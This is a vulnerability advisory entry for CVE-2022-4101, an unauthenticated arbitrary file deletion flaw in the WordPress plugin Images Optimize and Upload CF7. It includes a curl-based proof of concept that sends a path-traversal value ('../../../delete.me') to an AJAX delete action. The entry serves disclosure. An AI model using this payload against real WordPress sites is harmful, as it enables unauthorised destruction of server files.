Images Optimize and Upload CF7 <= 2.1.4 – Unauthenticated Arbitrary File Deletion | CVE 2022-4101 | Plugin Vulnerabilities

Description

The plugin does not validate the file to be deleted via an AJAX action available to unauthenticated users, which could allow them to delete arbitrary files on the server via path traversal attack.

Proof of Concept

1. Install contact-form-7 (dependency)

2. Install the vulnerable plugin (images-optimize-and-upload-cf7 version 2.1.3)

3. Invoke curl to create a potentially missing upload directory (required for the exploit to work):

curl 'https://example.com/wp-admin/admin-ajax.php?action=yr_api_uploader'

4. Invoke the following curl command to delete the delete.me file at the root of the blog:

curl 'https://example.com/wp-admin/admin-ajax.php?action=yr_api_delete' \
    --data 'file=../../../delete.me'

Affects Plugins

images-optimize-and-upload-cf7

No known fix

References

CVE

Classification

Type

TRAVERSAL

OWASP top 10

CWE

CVSS

10.0 (critical)

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website

https://cyllective.com/

Submitter twitter

Verified

Yes

WPVDB ID

2ce4c837-c62c-41ac-95ca-54bb1a6d1eeb

Timeline

Publicly Published

2022-12-21 (about 1 years ago)

Added

2022-12-21 (about 1 years ago)

Last Updated

2022-12-21 (about 1 years ago)

Other

Published

Title

Published

2019-05-23

Title

Simple File List Plugin < 3.2.8 - Unauthenticated Arbitrary File Download

Published

2022-05-16

Title

User Meta < 2.4.4 - Subscriber+ Local File Enumeration via Path Traversal

Published

2022-09-06

Title

BackupBuddy < 8.7.5 - Unauthenticated Arbitrary File Access

Published

2014-09-20

Title

W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated Arbitrary File Read

Published

2022-09-15

Title

SearchWP Live Ajax Search < 1.6.3 - Unauthenticated Local File Inclusion